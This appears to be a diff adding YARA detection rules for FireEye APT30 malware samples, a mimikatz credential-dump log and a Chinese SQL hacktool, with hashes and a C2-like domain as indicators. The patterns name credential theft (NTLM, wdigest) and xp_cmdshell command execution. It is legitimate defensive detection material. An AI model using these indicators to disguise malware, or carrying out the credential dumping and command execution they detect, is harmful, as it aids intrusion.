+      hash2 = "8c9db773d387bf9b3f2b6a532e4c937c"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Copyright 2012 Google Inc. All rights reserved." fullword wide
+      $s1 = "(Prxy%c-%s:%u)" fullword ascii
+      $s2 = "Google Inc." fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_9_RID2BB2 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:17:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\Windo" ascii
+      $s2 = "oHHOSTR" ascii
+      $s3 = "Softwa]\\Mic" ascii
+      $s4 = "Startup'T" ascii
+      $s6 = "Ora\\%^" ascii
+      $s7 = "\\Ohttp=r" ascii
+      $s17 = "help32Snapshot0L" ascii
+      $s18 = "TimUmoveH" ascii
+      $s20 = "WideChc[lobalAl" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_10_RID2BDA : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Version 4.7.3001" fullword wide
+      $s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+      $s2 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+      $s3 = "!! Use Connect Method !!" fullword ascii
+      $s4 = "(Prxy%c-%s:%u)" fullword ascii
+      $s5 = "msmsgs" fullword wide
+      $s18 = "(Prxy-No)" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_11_RID2BDB : APT DEMO FILE G0013 T1050 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
+      $s1 = "msofscan.exe" fullword wide
+      $s2 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
+      $s3 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+      $s4 = "Windows XP Professional x64 Edition or Windows Server 2003" fullword ascii
+      $s9 = "NetEagle_Scout - " fullword ascii
+      $s10 = "Server 4.0, Enterprise Edition" fullword ascii
+      $s11 = "Windows 3.1(Win32s)" fullword ascii
+      $s12 = "%s%s%s %s" fullword ascii
+      $s13 = "Server 4.0" fullword ascii
+      $s15 = "Windows Millennium Edition" fullword ascii
+      $s16 = "msofscan" fullword wide
+      $s17 = "Eagle-Norton360-OfficeScan" fullword ascii
+      $s18 = "Workstation 4.0" fullword ascii
+      $s19 = "2003 Microsoft Office system" fullword wide
+   condition: 
+      filesize < 250KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_12_RID2BDC : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:31"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Richic" fullword ascii
+      $s1 = "Accept: image/gif, */*" fullword ascii
+      $s2 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+   condition: 
+      filesize < 250KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_13_RID2BDD : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "msofscan.exe" fullword wide
+      $s1 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+      $s2 = "Microsoft Office Word Plugin Scan" fullword wide
+      $s3 = "? 2006 Microsoft Corporation.  All rights reserved." fullword wide
+      $s4 = "msofscan" fullword wide
+      $s6 = "2003 Microsoft Office system" fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_14_RID2BDE : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "AdobeReader.exe" fullword wide
+      $s4 = "10.1.7.27" fullword wide
+      $s5 = "Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All ri" wide
+      $s8 = "Adobe Reader" fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_15_RID2BDF : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:01"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\Windo" ascii
+      $s2 = "HHOSTR" ascii
+      $s3 = "Softwa]\\Mic" ascii
+      $s4 = "Startup'T" fullword ascii
+      $s17 = "help32Snapshot0L" fullword ascii
+      $s18 = "TimUmoveH" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_A_RID2C15 : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:34:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f49aa1090fa478b9857e15695be4a89f8f3e594"
+      hash2 = "396116cfb51cee090822913942f6ccf81856c2fb"
+      hash3 = "fef9c3b4b35c226501f7d60816bb00331a904d5b"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "WPVWhhiA" fullword ascii
+      $s6 = "VPWVhhiA" fullword ascii
+      $s11 = "VPhhiA" fullword ascii
+      $s12 = "uUhXiA" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_18_RID2BE2 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:31"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "w.km-nyc.com" fullword ascii
+      $s1 = "tscv.exe" fullword ascii
+      $s2 = "Exit/app.htm" ascii
+      $s3 = "UBD:\\D" ascii
+      $s4 = "LastError" ascii
+      $s5 = "MicrosoftHaveAck" ascii
+      $s7 = "HHOSTR" ascii
+      $s20 = "XPL0RE." ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_G_RID2C1B : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:35:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%s\\%s\\%s=%s" fullword ascii
+      $s1 = "Copy File %s OK!" fullword ascii
+      $s2 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+      $s4 = "open=%s" fullword ascii
+      $s5 = "Maybe a Encrypted Flash Disk" fullword ascii
+      $s12 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_19_RID2BE3 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+      $s1 = "%s,Volume:%s,Type:%s,TotalSize:%uMB,FreeSize:%uMB" fullword ascii
+      $s2 = "\\TEMP\\" ascii
+      $s3 = "\\Temporary Internet Files\\" ascii
+      $s5 = "%s TotalSize:%u Bytes" fullword ascii
+      $s6 = "This Disk Maybe a Encrypted Flash Disk!" fullword ascii
+      $s7 = "User:%-32s" fullword ascii
+      $s8 = "\\Desktop\\" ascii
+      $s9 = "%s.%u_%u" fullword ascii
+      $s10 = "Nick:%-32s" fullword ascii
+      $s11 = "E-mail:%-32s" fullword ascii
+      $s13 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+      $s14 = "Type:%-8s" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and 8 of them
+}
+
+rule APT30_Generic_E_v2_RID2D20 : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 10:18:31"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Nkfvtyvn}duf_Z}{Ys" fullword ascii
+      $s1 = "Nkfvtyvn}*Zrswru1i" fullword ascii
+      $s2 = "Nkfvtyvn}duf_Z}{V" fullword ascii
+      $s3 = "Nkfvtyvn}*ZrswrumT\\b" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_20_RID2BDB : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:21"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "dizhi.gif" fullword ascii
+      $s2 = "Mozilla/u" ascii
+      $s3 = "XicrosoftHaveAck" ascii
+      $s4 = "flyeagles" ascii
+      $s10 = "iexplore." ascii
+      $s13 = "WindowsGV" fullword ascii
+      $s16 = "CatePipe" fullword ascii
+      $s17 = "'QWERTY:/webpage3" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_21_RID2BDC : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Service.dll" fullword ascii
+      $s1 = "(%s:%s %s)" fullword ascii
+      $s2 = "%s \"%s\",%s %s" fullword ascii
+      $s5 = "Proxy-%s:%u" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_22_RID2BDD : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "(\\TEMP" fullword ascii
+      $s2 = "Windows\\Cur" fullword ascii
+      $s3 = "LSSAS.exeJ" fullword ascii
+      $s4 = "QC:\\WINDOWS" fullword ascii
+      $s5 = "System Volume" fullword ascii
+      $s8 = "PROGRAM FILE" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_23_RID2BDE : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:51"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "hostid" ascii
+      $s1 = "\\Window" ascii
+      $s2 = "%u:%u%s" fullword ascii
+      $s5 = "S2tware\\Mic" ascii
+      $s6 = "la/4.0 (compa" ascii
+      $s7 = "NameACKernel" fullword ascii
+      $s12 = "ToWideChc[lo" fullword ascii
+      $s14 = "help32SnapshotfL" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_24_RID2BDF : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:01"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dizhi.gif" fullword ascii
+      $s3 = "Mozilla/4.0" fullword ascii
+      $s4 = "lyeagles" fullword ascii
+      $s6 = "HHOSTR" ascii
+      $s7 = "#MicrosoftHaveAck7" ascii
+      $s8 = "iexplore." fullword ascii
+      $s17 = "ModuleH" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_26_RID2BE1 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "forcegue" fullword ascii
+      $s3 = "Windows\\Cur" fullword ascii
+      $s4 = "System Id" fullword ascii
+      $s5 = "Software\\Mic" fullword ascii
+      $s6 = "utiBy0ToWideCh&$a" fullword ascii
+      $s10 = "ModuleH" fullword ascii
+      $s15 = "PeekNamed6G" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_30_RID2BDC : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" fullword wide
+      $s3 = "RnhwtxtkyLRRMf{jJ}ny" fullword ascii
+      $s4 = "RnhwtxtkyLRRJ}ny" fullword ascii
+      $s5 = "ZRLDownloadToFileA" fullword ascii
+      $s9 = "5.1.2600.2180" fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Microfost_RID2C6E : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:48:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Copyright (c) 2007 Microfost All Rights Reserved" fullword wide
+      $s2 = "Microfost" fullword wide
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_K_RID2C1F : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:35:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Maybe a Encrypted Flash" fullword ascii
+      $s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+      $s1 = "\\TEMP\\" ascii
+      $s2 = "\\Temporary Internet Files\\" ascii
+      $s5 = "%s Size:%u Bytes" fullword ascii
+      $s7 = "$.DATA$" fullword ascii
+      $s10 = "? Size:%u By s" fullword ascii
+      $s12 = "Maybe a Encrypted Flash" fullword ascii
+      $s14 = "Name:%-32s" fullword ascii
+      $s15 = "NickName:%-32s" fullword ascii
+      $s19 = "Email:%-32s" fullword ascii
+      $s21 = "C:\\Prog" ascii
+      $s22 = "$LDDATA$" ascii
+      $s31 = "Copy File %s OK!" fullword ascii
+      $s32 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+      $s34 = "open=%s" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and ( all of ( $x* ) and 3 of ( $s* ) )
+}
+
+rule APT30_Sample_33_RID2BDF : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Version 4.7.3001" fullword wide
+      $s1 = "msmsgr.exe" fullword wide
+      $s2 = "MYUSER32.dll" fullword ascii
+      $s3 = "MYADVAPI32.dll" fullword ascii
+      $s4 = "CeleWare.NET1" fullword ascii
+      $s6 = "MYMSVCRT.dll" fullword ascii
+      $s7 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the" wide
+      $s8 = "WWW.CeleWare.NET1" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and 6 of them
+}
+
+rule APT30_Sample_34_RID2BE0 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:11"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "dizhi.gif" ascii
+      $s1 = "eagles.vip.nse" ascii
+      $s4 = "o%S:S0" ascii
+      $s5 = "la/4.0" ascii
+      $s6 = "s#!<4!2>s02==<'s1" ascii
+      $s7 = "HlobalAl" ascii
+      $s9 = "vcMicrosoftHaveAck7" ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_35_RID2BE1 : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:25:21"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WhBoyIEXPLORE.EXE.exe" fullword ascii
+      $s5 = "Startup>A" fullword ascii
+      $s18 = "olhelp32Snapshot" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Sample_1_RID2BAA : APT DEMO FILE G0013 {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:16:11"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, G0013"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "#hostid" fullword ascii
+      $s1 = "\\Windows\\C" ascii
+      $s5 = "TimUmove" fullword ascii
+      $s6 = "Moziea/4.0 (c" fullword ascii
+      $s7 = "StartupNA" fullword ascii
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_6_RID2C0A : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample - from files 168d207d0599ed0bb5bcfca3b3e7a9d3, 1e6ee89fddcf23132ee12802337add61, 5dd625af837e164dd2084b1f44a45808"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:32:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2c5e347083b77c9ead9e75d41e2fabe096460bba"
+      hash2 = "5d39a567b50c74c4a921b5f65713f78023099933"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GetStar" fullword
+      $s1 = ".rdUaS" fullword
+      $s2 = "%sOTwp/&A\\L" fullword
+      $s3 = "a Encrt% Flash Disk" fullword
+      $s4 = "ypeAutoRuChec" fullword
+      $s5 = "NoDriveT" fullword
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_7_RID2C0B : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample - from files 853a20f5fc6d16202828df132c41a061, 9c0cad1560cd0ffe2aa570621ef7d0a0, b590c15499448639c2748ff9e0d214b2"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:32:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e814914079af78d9f1b71000fee3c29d31d9b586"
+      hash2 = "0263de239ccef669c47399856d481e3361408e90"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Xjapor_*ata" fullword
+      $s2 = "Xjapor_o*ata" fullword
+      $s4 = "Ouopai" fullword
+   condition: 
+      filesize < 100KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_8_RID2C0C : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample - from files 7c307ca84f922674049c0c43ca09bec1, b8617302180d331e197cc0433fc5023d, e6289e7f9f26be692cbe6f335a706014"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:32:31"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
+      hash2 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Windows NT4.0" fullword
+      $s1 = "Windows NT3.51" fullword
+      $s2 = "%d;%d;%d;%ld;%ld;%ld;" fullword
+      $s3 = "%s %d.%d Build%d %s" fullword
+      $s4 = "MSAFD Tcpip [TCP/IP]" fullword
+      $s5 = "SQSRSS" fullword
+      $s8 = "WM_COMP" fullword
+      $s9 = "WM_MBU" fullword
+      $s11 = "WM_GRID" fullword
+      $s12 = "WM_RBU" fullword
+   condition: 
+      filesize < 250KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule APT30_Generic_9_RID2C0D : APT DEMO FILE G0013 GEN {
+   meta:
+      description = "FireEye APT30 Report Sample"
+      author = "Florian Roth"
+      reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+      date = "2015-04-03 09:32:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27a2b981d4c0bb8c3628bfe990db4619ddfdff74"
+      hash2 = "05f66492c163ec2a24c6a87c7a43028c5f632437"
+      hash3 = "263f094da3f64e72ef8dc3d02be4fb33de1fdb96"
+      tags = "APT, DEMO, FILE, G0013, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%s\\%s\\$NtRecDoc$" fullword
+      $s1 = "%s(%u)%s" fullword
+      $s2 = "http://%s%s%s" fullword
+      $s3 = "1.9.1.17" fullword wide
+      $s4 = "(C)Firefox and Mozilla Developers, according to the MPL 1.1/GPL 2.0/LGPL" wide
+   condition: 
+      filesize < 250KB and uint16 ( 0 ) == 0x5A4D and all of them
+}
+
+rule Mimikatz_Logfile_RID2D78 : DEMO HKTL MAL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Detects a log file generated by malicious hack tool mimikatz"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2015-03-31 10:33:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, HKTL, MAL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SID               :" ascii fullword
+      $s2 = "* NTLM     :" ascii fullword
+      $s3 = "Authentication Id :" ascii fullword
+      $s4 = "wdigest :" ascii fullword
+   condition: 
+      all of them
+}
+
+rule CN_Toolset_sig_1433_135_sqlr_RID30D0 : CHINA DEMO HKTL {
+   meta:
+      description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
+      author = "Florian Roth"
+      reference = "http://qiannao.com/ls/905300366/33834c0c/"
+      date = "2015-03-30 12:55:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
+      $s11 = ";DATABASE=master" fullword ascii
+      $s12 = "xp_cmdshell '" fullword ascii
+      $s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
+   condition: 
+      all of them
+}
+
